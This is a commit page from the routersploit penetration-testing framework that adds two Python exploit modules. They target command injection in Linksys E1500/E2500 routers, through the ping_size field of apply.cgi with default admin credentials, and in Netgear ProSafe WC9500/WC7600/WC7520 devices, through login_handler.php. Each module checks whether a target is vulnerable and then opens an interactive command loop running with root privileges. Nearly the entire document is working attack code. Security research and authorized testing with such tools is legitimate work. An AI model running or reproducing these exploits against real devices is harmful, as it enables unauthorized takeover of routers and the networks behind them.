Skip to content

R
routersploit
Commit 5a9d73b3 by fwkz
Options

Merge remote-tracking branch 'origin/master'

parents c9836b5e 07aeefdb
Showing with 153 additions and 0 deletions
routersploit/modules/exploits/linksys/1500_2500_rce.py 0 → 100644
import requests
import re
from routersploit import *
class Exploit(exploits.Exploit):
"""
Exploit for Linksys E1500 and E2500 devices Remote Code Execution vulnerability.
If the target is vulnerable, command loop is invoked that allows executing commands with root privileges.
"""
__info__ = {
'name': 'Linksys E1500/E2500',
'description': 'Module exploits remote command execution in Linksys E1500/E2500 devices. Diagnostics interface allows executing root privileged shell commands is available on dedicated web pages on the device.',
'authors': [
'Michael Messner', # vulnerability discovery
'Esteban Rodriguez (n00py)', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/24475/',
],
'targets': [
'Linksys E1500/E2500',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
port = exploits.Option(80, 'Target Port')
username = exploits.Option('admin', 'Username to login with')
password = exploits.Option('admin', 'Password to login with')
def run(self):
if self.check() == True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
try:
r = requests.post(url, data=data, auth=(self.username, self.password))
except requests.exceptions.MissingSchema:
return "Invalid URL format: %s" % url
except requests.exceptions.ConnectionError:
return "Connection error: %s" % url
return ""
def check(self):
# meaby random mark should be implemented
cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
url = sanitize_url("{}:{}/apply.cgi".format(self.target, self.port))
data = {"submit_button": "Diagnostics", "change_action":"gozila_cgi", "submit_type":"start_ping","action":"","commit":"0","ping_ip":"127.0.0.1","ping_size": "&" + cmd,"ping_times":"5","traceroute_ip":"127.0.0.1" }
try:
r = requests.post(url, data=data, auth=(self.username, self.password))
res = r.text
except:
return None # could not be verified
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True
return False
routersploit/modules/exploits/netgear/prosafe_rce.py 0 → 100644
import requests
import re
from routersploit import *
class Exploit(exploits.Exploit):
"""
Exploit implementation for Netgear ProSafe WC9500, WC7600, WC7520 remote command execution vulnerability.
If the target is vulnerable command shell is invoked.
"""
__info__ = {
'name': 'Netgear ProSafe RCE',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'authors': [
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://firmware.re/vulns/acsa-2015-002.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
'targets': [
'Netgear ProSafe WC9500',
'Netgear ProSafe WC7600',
'Netgear ProSafe WC7520',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check() == True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
cmd = raw_input("cmd > ")
print self.execute(cmd)
def execute(self, cmd):
url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData";{}; echo ffffffffffffffff'.format(cmd)
try:
r = requests.post(url, headers=headers, data=data)
res = r.text
except requests.exceptions.MissingSchema:
return "Invalid URL format: %s" % url
except requests.exceptions.ConnectionError:
return "Connection error: %s" % url
if 'ffffffffffffffff' in res:
res = re.findall("(|.+?)ffffffffffffffff", res, re.DOTALL)
if len(res):
return res[0]
return False
def check(self):
url = sanitize_url("{}:{}/login_handler.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = 'reqMethod=json_cli_reqMethod" "json_cli_jsonData"; echo 9fdbd928b52c1ef61615a6fd2e8b49af'
try:
r = requests.post(url, headers=headers, data=data)
res = r.text
except:
return None # target could not be verified
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True # target is vulnerable
return False # target not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment